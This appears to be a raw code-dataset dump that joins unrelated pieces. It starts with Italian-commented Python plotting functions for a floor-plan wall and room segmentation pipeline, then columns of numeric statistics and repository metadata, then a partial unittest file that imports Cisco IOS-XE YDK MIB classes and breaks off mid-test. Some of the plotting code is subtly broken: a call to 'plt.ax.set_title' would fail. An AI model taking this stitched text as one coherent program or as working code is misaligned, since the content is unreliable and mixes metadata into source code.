def disegna_extended_segments(extended_segments, lista_muri, savefig = True, format='pdf', filepath = '.', savename = '7_Extended', title = False):
'''
disegna in nero i muri di lista_muri, in rosso gli extended_segments
'''
ascisse = []
ordinate = []
#plt.subplot(223)
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title :
plt.ax.set_title('7.extended segments')
for e in lista_muri:
ascisse.append(e.x1)
ascisse.append(e.x2)
ordinate.append(e.y1)
ordinate.append(e.y2)
ax.plot(ascisse,ordinate, color='k', linewidth=3.0)
del ascisse[:]
del ordinate[:]
for e in extended_segments:
ascisse.append(e.x1)
ascisse.append(e.x2)
ordinate.append(e.y1)
ordinate.append(e.y2)
ax.plot(ascisse,ordinate, color='r', linewidth=1.5)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_extended_segments_e_contorno(vertici,xmin,ymin,xmax,ymax,extended_segments, savefig = True, format='pdf', filepath = '.', savename = '7_Extended_cotorno', title = False):
'''
disegna in nero i muri di lista_muri, in rosso gli extended_segments
'''
ascisse = []
ordinate = []
#plt.subplot(223)
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title :
plt.ax.set_title('7.extended segments contorno')
for e in extended_segments:
ascisse.append(e.x1)
ascisse.append(e.x2)
ordinate.append(e.y1)
ordinate.append(e.y2)
ax.plot(ascisse,ordinate, color='r', linewidth=1.5)
del ascisse[:]
del ordinate[:]
bbPath = mplPath.Path(vertici)
patch = patches.PathPatch(bbPath, facecolor='#DDDDDD', lw=2)
ax.add_patch(patch)
ax.set_xlim(xmin-1,xmax+1)
ax.set_ylim(ymin-1,ymax+1)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_distance_transform(distanceMap, savefig = True, format='pdf', filepath = '.', savename = '10_distance_transform', title = False):
'''
disegna la distance transforme
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title :
plt.title('10_distance_transform')
#distanceMap = ndimage.distance_transform_edt(im_bw)
plt.imshow(distanceMap)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
#TODO: cancella questa funzione che non serve a nulla.
def disegna_distance_transform_e_stanze(distanceMap,stanze,colori, savefig = True, format='pdf', filepath = '.', savename = '10b_distance_and_stanze', title = False):
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title :
plt.title('10b_distance_and_stanze')
plt.imshow(distanceMap)
for index,s in enumerate(stanze):
f_patch = PolygonPatch(s,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_medial_axis(points,b3, savefig = True, format='png', filepath = '.', savename = '11_medial_axis', title = False):
'''
disegna medial axis
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title :
plt.title('11_medial_axis')
ax.plot(points[:,0],points[:,1],'.')
ax.imshow(b3,cmap='Greys')
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def plot_nodi_e_stanze(colori,estremi, G, pos, stanze,stanze_collegate, savefig = True, format='pdf', filepath = '.', savename = '16_grafo_topologico', title = False):
'''
disegna le stenze con i nodi corrispondenti
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
xmin = estremi[0]
xmax = estremi[1]
ymin = estremi[2]
ymax = estremi[3]
if title :
plt.title('12_grafo_topologico')
for index,s in enumerate(stanze):
f_patch = PolygonPatch(s,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
#plotto il grafo
nx.draw_networkx_nodes(G,pos,node_color='w')
#nx.draw_networkx_edges(G,pos)
nx.draw_networkx_labels(G,pos)
#plotto gli edges come linee da un representative point a un altro, perche' con solo drawedges non li plotta. Forse sono nascosti dai poligoni.
for coppia in stanze_collegate:
i1 = stanze[coppia[0]]
i2 = stanze[coppia[1]]
p1 = i1.representative_point()
p2 = i2.representative_point()
plt.plot([p1.x,p2.x],[p1.y,p2.y],color='k',ls = 'dotted', lw=0.5)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_cluster_mura(cluster_mura, lista_muri,savefig = True, format='pdf', filepath = '.', savename = '5d_cluster_muri', title = False):
'''
disegna con lo stesso colore i muri con stesso cluster spaziale
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
ascisse = []
ordinate = []
numofcolors = len(set(cluster_mura))
cm = plt.get_cmap("nipy_spectral")
cNorm = colors.Normalize(vmin=0, vmax=numofcolors)
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap = cm)
#plt.subplot(222)
if title :
ax.set_title('4.spatial clusters')
for index,c in enumerate(np.random.permutation(list(set(cluster_mura)))):
for muro in lista_muri:
if muro.cluster_muro == c:
ascisse.extend((muro.x1,muro.x2))
ordinate.extend((muro.y1,muro.y2))
ax.plot(ascisse,ordinate, color=colors.rgb2hex(scalarMap.to_rgba(index)), linewidth=2.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
| 29.492815
| 368
| 0.683319
| 5,198
| 34,890
| 4.485187
| 0.088688
| 0.018873
| 0.024063
| 0.019816
| 0.814575
| 0.808742
| 0.788325
| 0.774856
| 0.753624
| 0.743888
| 0
| 0.027669
| 0.154743
| 34,890
| 1,183
| 369
| 29.492815
| 0.762877
| 0.092577
| 0
| 0.789014
| 0
| 0
| 0.058558
| 0.005824
| 0
| 0
| 0
| 0.002536
| 0
| 0
| null | null | 0
| 0.021223
| null | null | 0.001248
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a66d26c199f89f7d4221b203f292e6d7e8e9f93
| 94,740
|
py
|
Python
|
cisco-ios-xe/ydk/models/cisco_ios_xe/test/import_tests.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/test/import_tests.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/test/import_tests.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
import unittest
class ImportTest(unittest.TestCase):
def test_ATM_FORUM_TC_MIB(self):
from ydk.models.cisco_ios_xe.ATM_FORUM_TC_MIB import TruthValue
from ydk.models.cisco_ios_xe.ATM_FORUM_TC_MIB import AtmServiceCategory
def test_ATM_MIB(self):
from ydk.models.cisco_ios_xe.ATM_MIB import ATMMIB
def test_ATM_TC_MIB(self):
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoTrafficDescriptor
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTaggingNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTaggingScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingMcr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTransparentNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTransparentScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpTaggingNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpNoScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTaggingScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmConnCastType
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmConnKind
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmInterfaceType
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmServiceCategory
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmVorXAdminStatus
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmVorXOperStatus
def test_BGP4_MIB(self):
from ydk.models.cisco_ios_xe.BGP4_MIB import BGP4MIB
def test_BRIDGE_MIB(self):
from ydk.models.cisco_ios_xe.BRIDGE_MIB import BRIDGEMIB
def test_CISCO_AAA_SERVER_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_AAA_SERVER_MIB import CiscoAAAProtocol
from ydk.models.cisco_ios_xe.CISCO_AAA_SERVER_MIB import CISCOAAASERVERMIB
def test_CISCO_AAA_SESSION_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_AAA_SESSION_MIB import CISCOAAASESSIONMIB
def test_CISCO_AAL5_MIB(self):
pass
def test_CISCO_ATM_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ATM_EXT_MIB import OamCCStatus
from ydk.models.cisco_ios_xe.CISCO_ATM_EXT_MIB import OamCCVcState
def test_CISCO_ATM_PVCTRAP_EXTN_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ATM_PVCTRAP_EXTN_MIB import CatmOAMRecoveryType
from ydk.models.cisco_ios_xe.CISCO_ATM_PVCTRAP_EXTN_MIB import CatmOAMFailureType
from ydk.models.cisco_ios_xe.CISCO_ATM_PVCTRAP_EXTN_MIB import CISCOATMPVCTRAPEXTNMIB
def test_CISCO_ATM_QOS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ATM_QOS_MIB import VcParamConfigLocation
from ydk.models.cisco_ios_xe.CISCO_ATM_QOS_MIB import VpState
from ydk.models.cisco_ios_xe.CISCO_ATM_QOS_MIB import CISCOATMQOSMIB
def test_CISCO_BGP4_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_BGP4_MIB import CbgpSafi
from ydk.models.cisco_ios_xe.CISCO_BGP4_MIB import CISCOBGP4MIB
def test_CISCO_BGP_POLICY_ACCOUNTING_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_BGP_POLICY_ACCOUNTING_MIB import CISCOBGPPOLICYACCOUNTINGMIB
def test_CISCO_BULK_FILE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_BULK_FILE_MIB import CISCOBULKFILEMIB
def test_CISCO_CABLE_SPECTRUM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CABLE_SPECTRUM_MIB import CCSRequestOperation
from ydk.models.cisco_ios_xe.CISCO_CABLE_SPECTRUM_MIB import CCSRequestOperState
from ydk.models.cisco_ios_xe.CISCO_CABLE_SPECTRUM_MIB import CISCOCABLESPECTRUMMIB
def test_CISCO_CABLE_WIDEBAND_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CABLE_WIDEBAND_MIB import CISCOCABLEWIDEBANDMIB
def test_CISCO_CBP_TARGET_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_MIB import CISCOCBPTARGETMIB
def test_CISCO_CBP_TARGET_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_TC_MIB import CcbptTargetType
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_TC_MIB import CcbptTargetDirection
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_TC_MIB import CcbptPolicySourceType
def test_CISCO_CBP_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CBP_TC_MIB import CbpExecutionStrategy
def test_CISCO_CDP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CDP_MIB import CISCOCDPMIB
def test_CISCO_CEF_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CEF_MIB import CISCOCEFMIB
def test_CISCO_CEF_TC(self):
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefIpVersion
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefAdjLinkType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefPathType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefPrefixSearchState
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefForwardingElementSpecialType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefAdminStatus
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefOperStatus
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefFailureReason
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefCCType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefCCAction
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefCCStatus
def test_CISCO_CONFIG_COPY_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import ConfigCopyProtocol
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import ConfigCopyState
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import ConfigCopyFailCause
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import ConfigFileType
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import CISCOCONFIGCOPYMIB
def test_CISCO_CONFIG_MAN_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CONFIG_MAN_MIB import HistoryEventMedium
from ydk.models.cisco_ios_xe.CISCO_CONFIG_MAN_MIB import CISCOCONFIGMANMIB
def test_CISCO_CONTEXT_MAPPING_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CONTEXT_MAPPING_MIB import CISCOCONTEXTMAPPINGMIB
def test_CISCO_DATA_COLLECTION_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_DATA_COLLECTION_MIB import CdcFileFormat
from ydk.models.cisco_ios_xe.CISCO_DATA_COLLECTION_MIB import CdcFileXferStatus
from ydk.models.cisco_ios_xe.CISCO_DATA_COLLECTION_MIB import CISCODATACOLLECTIONMIB
def test_CISCO_DIAL_CONTROL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_DIAL_CONTROL_MIB import CISCODIALCONTROLMIB
def test_CISCO_DOCS_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_DOCS_EXT_MIB import CISCODOCSEXTMIB
def test_CISCO_DOT3_OAM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_DOT3_OAM_MIB import CISCODOT3OAMMIB
def test_CISCO_DYNAMIC_TEMPLATE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_DYNAMIC_TEMPLATE_MIB import CISCODYNAMICTEMPLATEMIB
def test_CISCO_DYNAMIC_TEMPLATE_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_DYNAMIC_TEMPLATE_TC_MIB import DynamicTemplateType
from ydk.models.cisco_ios_xe.CISCO_DYNAMIC_TEMPLATE_TC_MIB import DynamicTemplateTargetType
def test_CISCO_EIGRP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_EIGRP_MIB import CISCOEIGRPMIB
def test_CISCO_EMBEDDED_EVENT_MGR_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_EMBEDDED_EVENT_MGR_MIB import NotifySource
from ydk.models.cisco_ios_xe.CISCO_EMBEDDED_EVENT_MGR_MIB import CISCOEMBEDDEDEVENTMGRMIB
def test_CISCO_ENHANCED_MEMPOOL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENHANCED_MEMPOOL_MIB import CempMemPoolTypes
from ydk.models.cisco_ios_xe.CISCO_ENHANCED_MEMPOOL_MIB import CISCOENHANCEDMEMPOOLMIB
def test_CISCO_ENTITY_ALARM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENTITY_ALARM_MIB import AlarmSeverity
from ydk.models.cisco_ios_xe.CISCO_ENTITY_ALARM_MIB import CISCOENTITYALARMMIB
def test_CISCO_ENTITY_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENTITY_EXT_MIB import CISCOENTITYEXTMIB
def test_CISCO_ENTITY_FRU_CONTROL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import PowerRedundancyType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import PowerAdminType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import PowerOperType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import ModuleAdminType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import ModuleOperType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import ModuleResetReasonType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import FRUCoolingUnit
from ydk.models.cisco_ios_xe.CISCO_ENTITY_FRU_CONTROL_MIB import CISCOENTITYFRUCONTROLMIB
def test_CISCO_ENTITY_QFP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENTITY_QFP_MIB import CiscoQfpTimeInterval
from ydk.models.cisco_ios_xe.CISCO_ENTITY_QFP_MIB import CiscoQfpMemoryResource
from ydk.models.cisco_ios_xe.CISCO_ENTITY_QFP_MIB import CISCOENTITYQFPMIB
def test_CISCO_ENTITY_SENSOR_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENTITY_SENSOR_MIB import SensorDataType
from ydk.models.cisco_ios_xe.CISCO_ENTITY_SENSOR_MIB import SensorDataScale
from ydk.models.cisco_ios_xe.CISCO_ENTITY_SENSOR_MIB import SensorStatus
from ydk.models.cisco_ios_xe.CISCO_ENTITY_SENSOR_MIB import SensorThresholdSeverity
from ydk.models.cisco_ios_xe.CISCO_ENTITY_SENSOR_MIB import SensorThresholdRelation
from ydk.models.cisco_ios_xe.CISCO_ENTITY_SENSOR_MIB import CISCOENTITYSENSORMIB
def test_CISCO_ENTITY_VENDORTYPE_OID_MIB(self):
pass
def test_CISCO_ENVMON_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ENVMON_MIB import CiscoEnvMonState
from ydk.models.cisco_ios_xe.CISCO_ENVMON_MIB import CISCOENVMONMIB
def test_CISCO_ETHERLIKE_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ETHERLIKE_EXT_MIB import CISCOETHERLIKEEXTMIB
def test_CISCO_ETHER_CFM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ETHER_CFM_MIB import CISCOETHERCFMMIB
def test_CISCO_FIREWALL_TC(self):
from ydk.models.cisco_ios_xe.CISCO_FIREWALL_TC import CFWNetworkProtocol
from ydk.models.cisco_ios_xe.CISCO_FIREWALL_TC import CFWApplicationProtocol
from ydk.models.cisco_ios_xe.CISCO_FIREWALL_TC import CFWPolicyTargetType
from ydk.models.cisco_ios_xe.CISCO_FIREWALL_TC import CFWUrlfVendorId
from ydk.models.cisco_ios_xe.CISCO_FIREWALL_TC import CFWUrlServerStatus
def test_CISCO_FLASH_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_FLASH_MIB import FlashFileType
from ydk.models.cisco_ios_xe.CISCO_FLASH_MIB import CISCOFLASHMIB
def test_CISCO_FTP_CLIENT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_FTP_CLIENT_MIB import CISCOFTPCLIENTMIB
def test_CISCO_HSRP_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_HSRP_EXT_MIB import CISCOHSRPEXTMIB
def test_CISCO_HSRP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_HSRP_MIB import HsrpState
from ydk.models.cisco_ios_xe.CISCO_HSRP_MIB import CISCOHSRPMIB
def test_CISCO_IETF_ATM2_PVCTRAP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_ATM2_PVCTRAP_MIB import CISCOIETFATM2PVCTRAPMIB
def test_CISCO_IETF_ATM2_PVCTRAP_MIB_EXTN(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_ATM2_PVCTRAP_MIB_EXTN import CISCOIETFATM2PVCTRAPMIBEXTN
def test_CISCO_IETF_BFD_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_BFD_MIB import CiscoBfdDiag
from ydk.models.cisco_ios_xe.CISCO_IETF_BFD_MIB import CISCOIETFBFDMIB
def test_CISCO_IETF_FRR_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_FRR_MIB import CISCOIETFFRRMIB
def test_CISCO_IETF_ISIS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CiiAdminState
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CiiLevelState
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CiiSupportedProtocol
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CiiMetricType
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CiiMetricStyle
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CiiISLevel
from ydk.models.cisco_ios_xe.CISCO_IETF_ISIS_MIB import CISCOIETFISISMIB
def test_CISCO_IETF_MPLS_ID_STD_03_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_MPLS_ID_STD_03_MIB import CISCOIETFMPLSIDSTD03MIB
def test_CISCO_IETF_MPLS_TE_EXT_STD_03_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_MPLS_TE_EXT_STD_03_MIB import CISCOIETFMPLSTEEXTSTD03MIB
def test_CISCO_IETF_PW_ATM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_ATM_MIB import CISCOIETFPWATMMIB
def test_CISCO_IETF_PW_ENET_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_ENET_MIB import CISCOIETFPWENETMIB
def test_CISCO_IETF_PW_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_MIB import CISCOIETFPWMIB
def test_CISCO_IETF_PW_MPLS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_MPLS_MIB import CISCOIETFPWMPLSMIB
def test_CISCO_IETF_PW_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_TC_MIB import CpwOperStatus
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_TC_MIB import CpwVcType
def test_CISCO_IETF_PW_TDM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IETF_PW_TDM_MIB import CISCOIETFPWTDMMIB
def test_CISCO_IF_EXTENSION_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IF_EXTENSION_MIB import IfIndexPersistenceState
from ydk.models.cisco_ios_xe.CISCO_IF_EXTENSION_MIB import CISCOIFEXTENSIONMIB
def test_CISCO_IGMP_FILTER_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IGMP_FILTER_MIB import CISCOIGMPFILTERMIB
def test_CISCO_IMAGE_LICENSE_MGMT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IMAGE_LICENSE_MGMT_MIB import CISCOIMAGELICENSEMGMTMIB
def test_CISCO_IMAGE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IMAGE_MIB import CISCOIMAGEMIB
def test_CISCO_IPMROUTE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPMROUTE_MIB import CISCOIPMROUTEMIB
def test_CISCO_IPSEC_FLOW_MONITOR_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import IkePeerType
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import IkeNegoMode
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import IkeHashAlgo
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import IkeAuthMethod
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import DiffHellmanGrp
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import KeyType
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import EncapMode
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import EncryptAlgo
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import AuthAlgo
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import CompAlgo
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import EndPtType
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import TunnelStatus
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import TrapStatus
from ydk.models.cisco_ios_xe.CISCO_IPSEC_FLOW_MONITOR_MIB import CISCOIPSECFLOWMONITORMIB
def test_CISCO_IPSEC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import CryptomapType
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import CryptomapSetBindStatus
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import IkeHashAlgo
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import IkeAuthMethod
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import IkeIdentityType
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import DiffHellmanGrp
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import EncryptAlgo
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import TrapStatus
from ydk.models.cisco_ios_xe.CISCO_IPSEC_MIB import CISCOIPSECMIB
def test_CISCO_IPSEC_POLICY_MAP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSEC_POLICY_MAP_MIB import CISCOIPSECPOLICYMAPMIB
def test_CISCO_IPSLA_AUTOMEASURE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSLA_AUTOMEASURE_MIB import CISCOIPSLAAUTOMEASUREMIB
def test_CISCO_IPSLA_ECHO_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB import CISCOIPSLAECHOMIB
def test_CISCO_IPSLA_JITTER_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSLA_JITTER_MIB import CISCOIPSLAJITTERMIB
def test_CISCO_IPSLA_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IPSLA_TC_MIB import IpSlaOperType
from ydk.models.cisco_ios_xe.CISCO_IPSLA_TC_MIB import IpSlaCodecType
from ydk.models.cisco_ios_xe.CISCO_IPSLA_TC_MIB import IpSlaReactVar
def test_CISCO_IP_LOCAL_POOL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IP_LOCAL_POOL_MIB import CISCOIPLOCALPOOLMIB
def test_CISCO_IP_TAP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IP_TAP_MIB import CISCOIPTAPMIB
def test_CISCO_IP_URPF_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_IP_URPF_MIB import UnicastRpfType
from ydk.models.cisco_ios_xe.CISCO_IP_URPF_MIB import CISCOIPURPFMIB
def test_CISCO_LICENSE_MGMT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_LICENSE_MGMT_MIB import ClmgmtLicenseTransferProtocol
from ydk.models.cisco_ios_xe.CISCO_LICENSE_MGMT_MIB import ClmgmtLicenseActionState
from ydk.models.cisco_ios_xe.CISCO_LICENSE_MGMT_MIB import ClmgmtLicenseActionFailCause
from ydk.models.cisco_ios_xe.CISCO_LICENSE_MGMT_MIB import CISCOLICENSEMGMTMIB
def test_CISCO_MEDIA_GATEWAY_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_MEDIA_GATEWAY_MIB import CGwServiceState
from ydk.models.cisco_ios_xe.CISCO_MEDIA_GATEWAY_MIB import CGwAdminState
from ydk.models.cisco_ios_xe.CISCO_MEDIA_GATEWAY_MIB import CCallControlJitterDelayMode
from ydk.models.cisco_ios_xe.CISCO_MEDIA_GATEWAY_MIB import CISCOMEDIAGATEWAYMIB
def test_CISCO_MPLS_LSR_EXT_STD_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_MPLS_LSR_EXT_STD_MIB import CISCOMPLSLSREXTSTDMIB
def test_CISCO_MPLS_TC_EXT_STD_MIB(self):
pass
def test_CISCO_NBAR_PROTOCOL_DISCOVERY_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_NBAR_PROTOCOL_DISCOVERY_MIB import CiscoPdDataType
from ydk.models.cisco_ios_xe.CISCO_NBAR_PROTOCOL_DISCOVERY_MIB import CISCONBARPROTOCOLDISCOVERYMIB
def test_CISCO_NETSYNC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncIfType
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncNetworkOption
